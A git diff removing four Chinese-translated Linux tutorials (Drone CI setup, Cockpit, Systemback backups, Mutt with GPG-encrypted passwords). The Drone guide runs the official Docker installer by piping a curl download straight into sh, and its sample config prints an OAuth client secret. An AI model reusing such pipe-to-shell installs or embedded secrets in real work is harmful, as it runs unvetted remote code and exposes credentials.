--- a/translated/tech/20151114 How to Setup Drone - a Continuous Integration Service in Linux.md
+++ /dev/null
@@ -1,317 +0,0 @@
-如何在linux 上配置持续集成服务 - Drone
-==============================================================
-
-如果你对一次又一次的克隆、构建、测试和部署代码感到厌倦了,可以考虑一下持续集成。持续集成也就是CI,是软件工程的像我们一样的频繁提交的代码库,构建、测试和部署的实践。CI 帮助我们快速的集成新代码到已有的代码基线。如果这个过程是自动化进行的,那么就会提高开发的速度,因为这可以减少开发人员手工构建和测试的时间。[Drone][1] 是一个免费的开源项目,用来提供一个非常棒的持续集成服务的环境,采用了Apache 2.0 协议。它已经集成近很多代码库提供商,比如Github、Bitbucket 以及Google COde,并且它可以从代码库提取代码,使我们可以编译多种语言,包括PHP, Node, Ruby, Go, Dart, Python, C/C++, JAVA 等等。它是如此一个强大的平台是因为它每次构建都使用了容器和docker 技术,这让用户可以在保证隔离的条件下完全控制他们自己的构建环境。
-
-### 1. 安装 Docker ###
-
-首先,我们要安装docker,因为这是Drone 的工作流的最关键的元素。Drone 合理的利用了docker 来构建和测试应用。容器技术提高了应用部署的效率。要安装docker ,我们需要在不同的linux 发行版本运行下面对应的命令,我们这里会说明Ubuntu 14.04 和CentOS 7 两个版本。
-
-#### Ubuntu ####
-
-要在Ubuntu 上安装Docker ,我们只需要运行下面的命令。
-
- # apt-get update
- # apt-get install docker.io
-
-安装之后我们需要使用`service` 命令重启docker 引擎。
-
- # service docker restart
-
-然后我们让docker 在系统启动时自动启动。
-
- # update-rc.d docker defaults
-
- Adding system startup for /etc/init.d/docker ...
- /etc/rc0.d/K20docker -> ../init.d/docker
- /etc/rc1.d/K20docker -> ../init.d/docker
- /etc/rc6.d/K20docker -> ../init.d/docker
- /etc/rc2.d/S20docker -> ../init.d/docker
- /etc/rc3.d/S20docker -> ../init.d/docker
- /etc/rc4.d/S20docker -> ../init.d/docker
- /etc/rc5.d/S20docker -> ../init.d/docker
-
-#### CentOS ####
-
-第一,我们要更新机器上已经安装的软件包。我们可以使用下面的命令。
-
- # sudo yum update
-
-要在centos 上安装docker,我们可以简单的运行下面的命令。
-
- # curl -sSL https://get.docker.com/ | sh
-
-安装好docker 引擎之后我么只需要简单实用下面的`systemd` 命令启动docker,因为centos 7 的默认init 系统是systemd。
-
- # systemctl start docker
-
-然后我们要让docker 在系统启动时自动启动。
-
- # systemctl enable docker
-
- ln -s '/usr/lib/systemd/system/docker.service' '/etc/systemd/system/multi-user.target.wants/docker.service'
-
-### 2. 安装 SQlite 驱动 ###
-
-Drone 默认使用SQLite3 数据库服务器来保存数据和信息。它会在/var/lib/drone/ 自动创建名为drone.sqlite 的数据库来处理数据库模式的创建和迁移。要安装SQLite3 我们要完成以下几步。
-
-#### Ubuntu 14.04 ####
-
-因为SQLite3 存在于Ubuntu 14.04 的默认软件库,我们只需要简单的使用apt 命令安装它。
-
- # apt-get install libsqlite3-dev
-
-#### CentOS 7 ####
-
-要在Centos 7 上安装选哟使用下面的yum 命令。
-
- # yum install sqlite-devel
-
-### 3. 安装 Drone ###
-
-最后,我们安装好依赖的软件,我们现在更进一步的接近安装Drone。在这一步里我们值简单的从官方链接下载对应的二进制软件包,然后使用默认软件包管理器安装Drone。
-
-#### Ubuntu ####
-
-我们将使用wget 从官方的[Debian 文件下载链接][2]下载drone 的debian 软件包。下面就是下载命令。
-
- # wget downloads.drone.io/master/drone.deb
-
- Resolving downloads.drone.io (downloads.drone.io)... 54.231.48.98
- Connecting to downloads.drone.io (downloads.drone.io)|54.231.48.98|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 7722384 (7.4M) [application/x-debian-package]
- Saving to: 'drone.deb'
- 100%[======================================>] 7,722,384 1.38MB/s in 17s
- 2015-11-06 14:09:28 (456 KB/s) - 'drone.deb' saved [7722384/7722384]
-
-下载好之后,我们将使用dpkg 软件包管理器安装它。
-
- # dpkg -i drone.deb
-
- Selecting previously unselected package drone.
- (Reading database ... 28077 files and directories currently installed.)
- Preparing to unpack drone.deb ...
- Unpacking drone (0.3.0-alpha-1442513246) ...
- Setting up drone (0.3.0-alpha-1442513246) ...
- Your system ubuntu 14: using upstart to control Drone
- drone start/running, process 9512
-
-#### CentOS ####
-
-在CentOS 机器上我们要使用wget 命令从[下载链接][3]下载RPM 包。
-
- # wget downloads.drone.io/master/drone.rpm
-
- --2015-11-06 11:06:45-- http://downloads.drone.io/master/drone.rpm
- Resolving downloads.drone.io (downloads.drone.io)... 54.231.114.18
- Connecting to downloads.drone.io (downloads.drone.io)|54.231.114.18|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 7763311 (7.4M) [application/x-redhat-package-manager]
- Saving to: ‘drone.rpm’
- 100%[======================================>] 7,763,311 1.18MB/s in 20s
- 2015-11-06 11:07:06 (374 KB/s) - ‘drone.rpm’ saved [7763311/7763311]
-
-然后我们使用yum 安装rpm 包。
-
- # yum localinstall drone.rpm
-
-### 4. 配置端口 ###
-
-安装完成之后,我们要使它工作要先进行配置。drone 的配置文件在**/etc/drone/drone.toml** 。默认情况下drone 的web 接口使用的是80,而这也是http 默认的端口,如果我们要下面所示的修改配置文件里server 块对应的值。
-
- [server]
- port=":80"
-
-### 5. 集成 Github ###
-
-为了运行Drone 我们必须设置最少一个和GitHub、GitHub 企业版,Gitlab,Gogs,Bitbucket 关联的集成点。在本文里我们只集成了github,但是如果哦我们要集成其他的我们可以在配置文件做修改。为了集成github 我们需要在[github setting] 创建一个新的应用。
-
-![Registering App Github](http://blog.linoxide.com/wp-content/uploads/2015/11/registering-app-github.png)
-
-要创建一个应用,我们需要在`New Application` 页面点击`Register`,然后如下所示填表。
-
-![Registering OAuth app github](http://blog.linoxide.com/wp-content/uploads/2015/11/registering-OAuth-app-github.png)
-
-我们应该保证在应用的配置项里设置了**授权了的回调链接**,链接看起来像`http://drone.linoxide.com/api/auth/github.com`。然后我们点击注册应用。所有都做好之后我们会看到我们需要在我们的Drone 配置文件里配置的客户端ID 和客户端密钥。
-
-![Client ID and Secret Token](http://blog.linoxide.com/wp-content/uploads/2015/11/client-id-secret-token.png)
-
-在这些都完成之后我们需要使用文本编辑器编辑drone 配置文件,比如使用下面的命令。
-
- # nano /etc/drone/drone.toml
-
-然后我们会在drone 的配置文件里面找到`[github]` 部分,紧接着的是下面所示的配置内容
-
- [github]
- client="3dd44b969709c518603c"
- secret="4ee261abdb431bdc5e96b19cc3c498403853632a"
- # orgs=[]
- # open=false
-
-![Configuring Github Drone](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-github-drone-e1446835124465.png)
-
-### 6. 配置 SMTP 服务器 ###
-
-如果我们想让drone 使用email 发送通知,那么我们需要在SMTP 配置里面设置我们的SMTP 服务器。如果我们已经有了一个SMTP 服务,那就只需要简单的使用它的配置文件就行了,但是因为我们没有一个SMTP 服务器,我们需要安装一个MTA 比如Postfix,然后在drone 配置文件里配置好SMTP。
-
-#### Ubuntu ####
-
-在ubuntu 里使用下面的apt 命令安装postfix。
-
- # apt-get install postfix
-
-#### CentOS ####
-
-在CentOS 里使用下面的yum 命令安装postfix。
-
- # yum install postfix
-
-安装好之后,我们需要编辑我们的postfix 配置文件。
-
- # nano /etc/postfix/main.cf
-
-然后我们要把myhostname 的值替换为我们自己的FQDN,比如drone.linoxide.com。
-
- myhostname = drone.linoxide.com
-
-现在开始配置drone 配置文件里的SMTP 部分。
-
- # nano /etc/drone/drone.toml
-
-找到`[smtp]` 部分补充上下面的内容。
-
- [smtp]
- host = "drone.linoxide.com"
- port = "587"
- from = "root@drone.linoxide.com"
- user = "root"
- pass = "password"
-
-![Configuring SMTP Drone](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-smtp-drone.png)
-
-注意:这里的**user** 和 **pass** 参数强烈推荐一定要改成一个用户的配置。
-
-### 7. 配置 Worker ###
-
-如我们所知的drone 利用了docker 完成构建、测试任务,我们需要把docker 配置为drone 的worker。要完成这些需要修改drone 配置文件里的`[worker]` 部分。
-
- # nano /etc/drone/drone.toml
-
-然后取消底下几行的注释并且补充上下面的内容。
-
- [worker]
- nodes=[
- "unix:///var/run/docker.sock",
- "unix:///var/run/docker.sock"
- ]
-
-这里我们只设置了两个节点,这意味着上面的配置文件只能同时执行2 个构建操作。要提高并发性可以增大节点的值。
-
- [worker]
- nodes=[
- "unix:///var/run/docker.sock",
- "unix:///var/run/docker.sock",
- "unix:///var/run/docker.sock",
- "unix:///var/run/docker.sock"
- ]
-
-使用上面的配置文件drone 被配置为使用本地的docker 守护程序可以同时构建4个任务。
-
-### 8. 重启 Drone ###
-
-最后,当所有的安装和配置都准备好之后,我们现在要在本地的linux 机器上启动drone 服务器。
-
-#### Ubuntu ####
-
-因为ubuntu 14.04 使用了sysvinit 作为默认的init 系统,所以只需要简单执行下面的service 命令就可以启动drone 了。
-
- # service drone restart
-
-要让drone 在系统启动时也自动运行,需要运行下面的命令。
-
- # update-rc.d drone defaults
-
-#### CentOS ####
-
-因为CentOS 7使用systemd 作为init 系统,所以只需要运行下面的systemd 命令就可以重启drone。
-
- # systemctl restart drone
-
-要让drone 自动运行只需要运行下面的命令。
-
- # systemctl enable drone
-
-### 9. 添加防火墙例外 ###
-
-众所周知drone 默认使用了80 端口而我们又没有修改他,所以我们需要配置防火墙程序允许80 端口(http)开发并允许其他机器可以通过网络连接。
-
-#### Ubuntu 14.04 ####
-
-iptables 是最流行的防火墙程序,并且ubuntu 默认安装了它。我们需要修改iptable 暴露端口80,这样我们才能让drone 的web 界面在网络上被大家访问。
-
- # iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
- # /etc/init.d/iptables save
-
-#### CentOS 7 ####
-
-因为CentOS 7 默认安装了systemd,它使用firewalld 作为防火墙程序。为了在firewalld 上打开80端口(http 服务),我们需要执行下面的命令。
-
- # firewall-cmd --permanent --add-service=http
-
- success
-
- # firewall-cmd --reload
-
- success
-
-### 10. 访问web 界面 ###
-
-现在我们将在我们最喜欢的浏览器上通过web 界面打开drone。要完成这些我们要把浏览器指向运行drone 的服务器。因为drone 默认使用80 端口而我们有没有修改过,所以我们只需要在浏览器里根据我们的配置输入`http://ip-address/` 或 `http://drone.linoxide.com` 就行了。在我们正确的完成了上述操作后,我们就可以看到登陆界面了。
-
-![Login Github Drone](http://blog.linoxide.com/wp-content/uploads/2015/11/login-github-drone-e1446834688394.png)
-
-因为在上面的步骤里配置了Github,我们现在只需要简单的选择github然后进入应用授权步骤,这些完成后我们就可以进入工作台了。
-
-![Drone Dashboard](http://blog.linoxide.com/wp-content/uploads/2015/11/drone-dashboard.png)
-
-这里它会同步我们在github 上的代码库,然后询问我们要在drone 上构建那个代码库。
-
-![Activate Repository](http://blog.linoxide.com/wp-content/uploads/2015/11/activate-repository-e1446835574595.png)
-
-这一步完成后,它会询问我们在代码库里添加`.drone.yml` 文件的新名称,并且在这个文件里定义构建的过程和配置项,比如使用那个docker 镜像,执行那些命令和脚本来编译,等等。
-
-我们按照下面的内容来配置我们的`.drone.yml`。
-
- image: python
- script:
- - python helloworld.py
- - echo "Build has been completed."
-
-这一步完成后我们就可以使用drone 应用里的YAML 格式的配置文件来构建我们的应用了。所有对代码库的提交和改变此时都会同步到这个仓库。一旦提交完成了,drone 就会自动开始构建。
-
-![Building Application Drone](http://blog.linoxide.com/wp-content/uploads/2015/11/building-application-drone.png)
-
-所有操作都完成后,我们就能在终端看到构建的结果了。
-
-![Build Success Drone](http://blog.linoxide.com/wp-content/uploads/2015/11/build-success-drone.png)
-
-### 总结 ###
-
-在本文中我们学习了如何安装一个可以工作的使用drone 的持续集成平台。如果我们愿意我们甚至可以从drone.io 官方提供的服务开始工作。我们可以根据自己的需求从免费的服务或者收费服务开始。它通过漂亮的web界面和强大的功能改变了持续集成的世界。它可以集成很多第三方应用和部署平台。如果你有任何问题、建议可以直接反馈给我们,谢谢。
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/setup-drone-continuous-integration-linux/
-
-作者:[Arun Pyasi][a]
-译者:[ezio](https://github.com/oska874)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arunp/
-[1]:https://drone.io/
-[2]:http://downloads.drone.io/master/drone.deb
-[3]:http://downloads.drone.io/master/drone.rpm
-[4]:https://github.com/settings/developers
diff --git a/translated/tech/20151123 How to Install Cockpit in Fedora or CentOS or RHEL or Arch Linux.md b/translated/tech/20151123 How to Install Cockpit in Fedora or CentOS or RHEL or Arch Linux.md
deleted file mode 100644
index 38a89dcbc2..0000000000
--- a/translated/tech/20151123 How to Install Cockpit in Fedora or CentOS or RHEL or Arch Linux.md
+++ /dev/null
@@ -1,148 +0,0 @@
-如何在 Fedora/CentOS/RHEL 或 Arch Linux 上安装 Cockpit
-================================================================================
-Cockpit 是一个免费开源的服务器管理软件,它使得我们可以通过它好看的 web 前端界面轻松地管理我们的 GNU/Linux 服务器。Cockpit 使得 linux 系统管理员、系统维护员和开发者能轻松地管理他们的服务器并执行一些简单的任务,例如管理存储、检测日志、启动或停止服务以及一些其它任务。它的报告界面添加了一些很好的功能使得可以轻松地在终端和 web 界面之间切换。另外,它不仅使得管理一台服务器变得简单,更重要的是只需要一个单击就可以在一个地方同时管理多个通过网络连接的服务器。它非常轻量级,web 界面也非常简单易用。在这篇博文中,我们会学习如何安装 Cockpit 并用它管理我们的运行着 Fedora、CentOS、Arch Linux 以及 RHEL 发行版操作系统的服务器。下面是 Cockpit 在我们的 GNU/Linux 服务器中一些非常棒的功能:
-
-1. 它包含 systemd 服务管理器。
-2. 有一个用于故障排除和日志分析的 Journal 日志查看器。
-3. 包括 LVM 在内的存储配置比以前任何时候都要简单。
-4. 用 Cockpit 可以进行基本的网络配置。
-5. 可以轻松地添加和删除用户以及管理多台服务器。
-
-### 1. 安装 Cockpit ###
-
-首先,我们需要在我们基于 linux 的服务器上安装 Cockpit。大部分发行版的官方软件仓库中都有可用的 cockpit 安装包。这篇博文中,我们会在 Fedora 22、CentOS 7、Arch Linux 和 RHEL 7 中通过它们的官方软件仓库安装 Cockpit。
-
-#### CentOS / RHEL ####
-
-CentOS 和 RHEL 官方软件库中有可用的 Cockpit。我们只需要用 yum 管理器就可以安装。只需要以 sudo/root 权限运行下面的命令就可以安装它。
-
- # yum install cockpit
-
-![Centos 上安装 Cockpit](http://blog.linoxide.com/wp-content/uploads/2015/10/install-cockpit-centos.png)
-
-#### Fedora 22/21 ####
-
-和 CentOS 一样, Fedora 的官方软件库默认也有可用的 Cockpit。我们只需要用 dnf 软件包管理器就可以安装 Cockpit。
-
- # dnf install cockpit
-
-![Fedora 上安装 Cockpit](http://blog.linoxide.com/wp-content/uploads/2015/10/install-cockpit-fedora.png)
-
-#### Arch Linux ####
-
-现在 Arch Linux 官方软件库中还没有可用的 Cockpit,但 Arch 用户库(Arch User Repository,AUR)有。只需要运行下面的 yaourt 命令就可以安装。
-
- # yaourt cockpit
-
-![Arch linux 上安装 Cockpit](http://blog.linoxide.com/wp-content/uploads/2015/10/install-cockpit-archlinux.png)
-
-### 2. 启动并启用 Cockpit ###
-
-成功安装完 Cockpit,我们就要用服务/守护进程管理器启动 Cockpit 服务。到了 2015 年,尽管一些 linux 发行版仍然运行 SysVinit 管理守护进程,但大部分 linux 发行版都采用了 Systemd,Cockpit 使用 systemd 完成从运行守护进程到服务几乎所有的功能。因此,我们只能在运行着 Systemd 的最新的 linux 发行版中安装 Cockpit。要启动 Cockpit 并让它在每次系统重启时自动启动,我们需要在终端或控制台中运行下面的命令。
- # systemctl start cockpit
-
- # systemctl enable cockpit.socket
-
- 创建从 /etc/systemd/system/sockets.target.wants/cockpit.socket 到 /usr/lib/systemd/system/cockpit.socket 的符号链接。
-
-### 3. 允许通过防火墙 ###
-
-启动 Cockpit 并使得它能在每次系统重启时自动启动后,我们现在要给它配置防火墙。由于我们的服务器上运行着防火墙程序,我们需要允许它通过某些端口使得从服务器外面可以访问 Cockpit。
-
-#### Firewalld ####
-
- # firewall-cmd --add-service=cockpit --permanent
-
- success
-
- # firewall-cmd --reload
-
- success
-
-![允许 Cockpit 通过 Firewalld](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-allowing-firewalld.png)
-
-#### Iptables ####
-
- # iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-
- # service iptables save
-
-### 4. 访问 Cockpit Web 界面 ###
-
-下面,我们终于要通过 web 浏览器访问 Cockpit web 界面了。根据配置,我们只需要用浏览器打开 https://ip-address:9090 或 https://server.domain.com:9090。在我们这篇博文中,我们用浏览器打开 https://128.199.114.17:9090,正如下图所示。
-
-![通过 SSL 访问 Cockpit Web 服务](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-webserver-ssl-proceed.png)
-
-此时会出现一个 SSL 认证警告,因为我们正在使用一个自签名认证。我们只需要忽略这个警告并进入到登录页面,在 chrome/chromium 中,我们需要点击 Show Advanced 然后点击 **Proceed to 128.199.114.17 (unsafe)**。
-
-![Cockpit 登录界面](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-login-screen.png)
-
-现在,要进入仪表盘,我们需要输入详细的登录信息。这里,用户名和密码和用于登录我们的 linux 服务器的用户名和密码相同。当我们输入登录信息并点击 Log In 按钮后,我们就会进入到 Cockpit 仪表盘。
-
-![Cockpit 仪表盘](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-dashboard.png)
-
-这里我们可以看到所有的菜单以及 CPU、磁盘、网络、存储使用情况的可视化结果。仪表盘正如上图所示。
-
-#### 服务 ####
-
-要管理服务,我们需要点击 web 页面右边菜单中的 Services 按钮。然后,我们会看到服务被分成了 5 个类别,目标、系统服务、套接字、计时器和路径。
-
-![Cockpit 服务](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-services.png)
-
-#### Docker 容器 ####
-
-我们甚至可以用 Cockpit 管理 docker 容器。用 Cockpit 监控和管理 Docker 容器非常简单。由于我们的服务器中没有安装运行 docker,我们需要点击 Start Docker。
-
-
-![Cockpit 容器](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-container.png)
-
-Cockpit 会自动在我们的服务器上安装和运行 docker。启动之后,我们就会看到下面的截图。然后我们就可以按照需求管理 docker 镜像、容器。
-
-![Cockpit 容器管理](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-containers-mangement.png)
-
-#### Journal 日志查看器 ####
-
-Cockpit 有个日志查看器,它把错误、警告、注意分到不同的标签页。我们也有一个 All 标签页,在这里可以看到所有的日志信息。
-
-![Cockpit Journal 日志](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-journal-logs.png)
-
-#### 网络 ####
-
-在网络部分,我们可以看到两个可视化发送和接收速度的图。我们可以看到这里有一个可用网卡的列表,还有 Add Bond、Bridge、VLAN 的选项。如果我们需要配置一个网卡,我们只需要点击网卡名称。在下面,我们可以看到网络的 Journal 日志信息。
-
-![Cockpit Network](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-network.png)
-
-#### 存储 ####
-
-现在,用 Cockpit 可以方便地查看硬盘的读写速度。我们可以查看存储的 Journal 日志以便进行故障排除和修复。在页面中还有一个已用空间的可视化图。我们甚至可以卸载、格式化、删除一块硬盘的某个分区。它还有类似创建 RAID 设备、卷组等攻能。
-
-![Cockpit Storage](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-storage.png)
-
-#### 用户管理 ####
-
-通过 Cockpit Web 界面我们可以方便地创建新用户。在这里创建的账户会应用到系统用户账户。我们可以用它更改密码、指定角色、以及删除用户账户。
-
-![Cockpit Accounts](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-accounts.png)
-
-#### 实时终端 ####
-
-Cockpit 还有一个很棒的特性。是的,我们可以执行命令,用 Cockpit 界面提供的实时终端执行任务。这使得我们可以根据我们的需求在 web 界面和终端之间自由切换。
-
-![Cockpit 终端](http://blog.linoxide.com/wp-content/uploads/2015/10/cockpit-terminal.png)
-
-### 总结 ###
-
-Cockpit 是由 [Red Hat][1] 开发的使得管理服务器变得轻松简单的免费开源软件。它非常适合于进行简单的系统管理任务和新手系统管理员。它仍然处于开发阶段,还没有稳定版发行。因此不适合于生产环境。它是针对最新的默认安装了 systemd 的 Fedora、CentOS、Arch Linux、RHEL 系统开发的。如果你想在 Ubuntu 上安装 Cockpit,你可以通过 PPA 访问,但现在已经过期了。如果你有任何疑问、建议,请在下面的评论框中反馈给我们,这样我们可以改进和更新我们的内容。非常感谢 !
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/install-cockpit-fedora-centos-rhel-arch-linux/
-
-作者:[Arun Pyasi][a]
-译者:[ictlyh](http://mutouxiaogui.cn/blog/)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arunp/
-[1]:http://www.redhat.com/
\ No newline at end of file
diff --git a/translated/tech/20151201 Backup (System Restore Point) your Ubuntu or Linux Mint with SystemBack.md b/translated/tech/20151201 Backup (System Restore Point) your Ubuntu or Linux Mint with SystemBack.md
deleted file mode 100644
index c931365600..0000000000
--- a/translated/tech/20151201 Backup (System Restore Point) your Ubuntu or Linux Mint with SystemBack.md
+++ /dev/null
@@ -1,43 +0,0 @@
-# 使用 SystemBack 备份你的 Ubuntu/Linux Mint(系统还原)
-
-对于任何一款允许用户还原电脑到之前状态(包括文件系统,安装的应用,以及系统设置)的操作系统来说,系统还原都是必备功能,可以恢复系统故障以及其他的问题。
-
-有的时候安装一个程序或者驱动可能让你的系统黑屏。系统还原则让你电脑里面的系统文件(译者注:是系统文件,并非普通文件,详情请看**注意**部分)和程序恢复到之前工作正常时候的状态,进而让你远离那让人头痛的排障过程了。而且它也不会影响你的文件,照片或者其他数据。
-
-简单的系统备份还原工具[Systemback](https://launchpad.net/systemback)让你很容易地创建系统备份以及用户配置文件。一旦遇到问题,你可以简单地恢复到系统先前的状态。它还有一些额外的特征包括系统复制,系统安装以及Live系统创建。
-
-截图
-
-![systemback](http://2.bp.blogspot.com/-2UPS3yl3LHw/VlilgtGAlvI/AAAAAAAAGts/ueRaAghXNvc/s1600/systemback-1.jpg)
-
-![systemback](http://2.bp.blogspot.com/-7djBLbGenxE/Vlilgk-FZHI/AAAAAAAAGtk/2PVNKlaPO-c/s1600/systemback-2.jpg)
-
-![](http://3.bp.blogspot.com/-beZYwKrsT4o/VlilgpThziI/AAAAAAAAGto/cwsghXFNGRA/s1600/systemback-3.jpg)
-
-![](http://1.bp.blogspot.com/-t_gmcoQZrvM/VlilhLP--TI/AAAAAAAAGt0/GWBg6bGeeaI/s1600/systemback-5.jpg)
-
-**注意**:使用系统还原不会还原你的文件,音乐,电子邮件或者其他任何类型的私人文件。对不同用户来讲,这既是优点又是缺点。坏消息是它不会还原你意外删除的文件,不过你可以通过一个文件恢复程序来解决这个问题。如果你的计算机没有还原点,那么系统恢复就无法奏效,所以这个工具就无法帮助你(还原系统),如果你尝试恢复一个主要问题,你将需要移步到另外的步骤来进行故障排除。
-
-> > >适用于Ubuntu 15.10 Wily/16.04/15.04 Vivid/14.04 Trusty/Linux Mint 14.x/其他Ubuntu衍生版,打开终端,将下面这些命令复制过去:
-
-终端命令:
-
-```
-sudo add-apt-repository ppa:nemh/systemback
-sudo apt-get update
-sudo apt-get install systemback
-
-```
-
-大功告成。
-
---------------------------------------------------------------------------------
-
-via: http://www.noobslab.com/2015/11/backup-system-restore-point-your.html
-
-译者:[DongShuaike](https://github.com/DongShuaike)
-校对:[Caroline](https://github.com/carolinewuyan)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]:https://launchpad.net/systemback
diff --git a/translated/tech/20151201 How to use Mutt email client with encrypted passwords.md b/translated/tech/20151201 How to use Mutt email client with encrypted passwords.md
deleted file mode 100644
index 1e8a032a04..0000000000
--- a/translated/tech/20151201 How to use Mutt email client with encrypted passwords.md
+++ /dev/null
@@ -1,138 +0,0 @@
-如何使用加密过密码的Mutt邮件客户端
-================================================================================
-Mutt是一个开源的Linux/UNIX终端环境下的邮件客户端。连同[Alpine][1],Mutt有充分的理由在Linux命令行热衷者中有最忠诚的追随者。想一下你对邮件客户端的期待的事情,Mutt拥有:多协议支持(e.g., POP3, IMAP and SMTP),S/MIME和PGP/GPG集成,线程会话,颜色编码,可定制宏/快捷键,等等。另外,基于命令行的Mutt相比笨重的web浏览器(如:Gmail,Ymail)或可视化邮件客户端(如:Thunderbird,MS Outlook)是一个轻量访问电子邮件的选择。
-
-当你想使用Mutt通过公司的SMTP/IMAP服务器访问或发送邮件,或取代网页邮件服务,可能所关心的一个问题是如何保护您的邮件凭据(如:SMTP/IMAP密码)存储在一个纯文本Mutt配置文件(~/.muttrc)。
-
-对于一些人安全的担忧,确实有一个容易的方法来**加密Mutt配置文件***,防止这种风险。在这个教程中,我描述了如何加密Mutt敏感配置,比如SMTP/IMAP密码使用GnuPG(GPG),一个开源的OpenPGP实现。
-
-### 第一步 (可选):创建GPG密钥 ###
-
-因为我们将要使用GPG加密Mutt配置文件,如果你没有,第一步就是创建一个GPG密钥(公有/私有 密钥对)。如果有,忽略这步。
-
-创建一个新GPG密钥,输入下面的。
-
- $ gpg --gen-key
-
-选择密钥类型(RSA),密钥长度(2048 bits),和过期时间(0,不过期)。当出现用户ID提示时,输入你的名字(Dan Nanni) 和邮箱地址(myemail@email.com)关联到私有/公有密钥对。最后,输入一个密码来保护你的私钥。
-
-![](https://c2.staticflickr.com/6/5726/22808727824_7735f11157_c.jpg)
-
-生成一个GPG密钥需要大量的随机字节熵,所以在生成密钥期间确保在你的系统上执行一些随机行为(如:打键盘,移动鼠标或者读写磁盘)。根据密钥长度决定生成GPG密钥要花几分钟或更多时间。
-
-![](https://c1.staticflickr.com/1/644/23328597612_6ac5a29944_c.jpg)
-
-### 第二部:加密Mutt敏感配置 ###
-
-下一步,在~/.mutt目录创建一个新的文本文件,然后把一些你想隐藏的Mutt敏感配置放进去。这个例子里,我指定了SMTP/IMAP密码。
-
- $ mkdir ~/.mutt
- $ vi ~/.mutt/password
-
-----------
-
- set smtp_pass="XXXXXXX"
- set imap_pass="XXXXXXX"
-
-现在gpg用你的公钥加密这个文件如下。
-
- $ gpg -r myemail@email.com -e ~/.mutt/password
-
-这将创建~/.mutt/password.gpg,这个是一个GPG加密原始版本文件。
-
-继续删除~/.mutt/password,只保留GPG加密版本。
-
-### 第三部:创建完整Mutt配置文件 ###
-
-由于你已经在一个单独的文件加密了Mutt敏感配置,你可以在~/.muttrc指定其余的Mutt配置。然后增加下面这行在~/.muttrc末尾。
-
- source "gpg -d ~/.mutt/password.gpg |"
-
-当你使用Mutt,这行将解密~/.mutt/password.gpg,然后将解密内容应用到你的Mutt配置。
-
-下面展示一个完整Mutt配置例子,这允许你用Mutt访问Gmail,没有暴露你的SMTP/IMAP密码。取代你用Gmail ID登陆你的账户。
-
- set from = "yourgmailaccount@gmail.com"
- set realname = "Your Name"
- set smtp_url = "smtp://yourgmailaccount@smtp.gmail.com:587/"
- set imap_user = "yourgmailaccount@gmail.com"
- set folder = "imaps://imap.gmail.com:993"
- set spoolfile = "+INBOX"
- set postponed = "+[Google Mail]/Drafts"
- set trash = "+[Google Mail]/Trash"
- set header_cache =~/.mutt/cache/headers
- set message_cachedir =~/.mutt/cache/bodies
- set certificate_file =~/.mutt/certificates
- set move = no
- set imap_keepalive = 900
-
- # encrypted IMAP/SMTP passwords
- source "gpg -d ~/.mutt/password.gpg |"
-
-### 第四部(可选):配置GPG代理 ###
-
-这时候,你将可以使用加密了IMAP/SMTP密码的Mutt。无论如何,每次你运行Mutt,你都要先被提示输入一个GPG密码来使用你的私钥解密IMAP/SMTP密码。
-
-![](https://c2.staticflickr.com/6/5667/23437064775_20c874940f_c.jpg)
-
-如果你想避免这样的GPG密码提示,你可以部署gpg代理。运行一个后台程序,gpg代理安全的缓存你的GPG密码,无需手工干预gpg自动从gpg代理获得你的GPG密码。如果你正在使用Linux桌面,你可以使用桌面特定方式来配置一些东西等价于gpg代理,例如,GNOME桌面的gnome-keyring-daemon。
-
-你可以在基于Debian系统安装gpg代理:
-
-$ sudo apt-get install gpg-agent
-
-gpg代理是基于Red Hat系统预装的。
-
-现在增加下面这些道你的.bashrc文件。
-
- envfile="$HOME/.gnupg/gpg-agent.env"
- if [[ -e "$envfile" ]] && kill -0 $(grep GPG_AGENT_INFO "$envfile" | cut -d: -f 2) 2>/dev/null; then
- eval "$(cat "$envfile")"
- else
- eval "$(gpg-agent --daemon --allow-preset-passphrase --write-env-file "$envfile")"
- fi
- export GPG_AGENT_INFO
-
-重载.bashrc,或单纯的登出然后登陆回来。
-
- $ source ~/.bashrc
-
-现在确认GPG_AGENT_INFO环境变量已经设置妥当。
-
- $ echo $GPG_AGENT_INFO
-
-----------
-
- /tmp/gpg-0SKJw8/S.gpg-agent:942:1
-
-并且,当你输入gpg-agent命令时,你应该看到下面的信息。
-
- $ gpg-agent
-
-----------
-
- gpg-agent: gpg-agent running and available
-
-一旦gpg-agent启动运行,它将会在第一次提示你输入密码时缓存你的GPG密码。随后你运行Mutt多次,你将不会被提示要GPG密码(gpg-agent一直开着,缓存就不会过期)。
-
-![](https://c1.staticflickr.com/1/664/22809928093_3be57698ce_c.jpg)
-
-### 结论 ###
-
-在这个指导里,我提出一个方法加密Mutt敏感配置如SMTP/IMAP密码使用GnuPG。注意,如果你想在Mutt上使用GnuPG或者登陆你的邮件信息,你可以参考[官方指南][2]在使用GPG与Mutt结合。
-
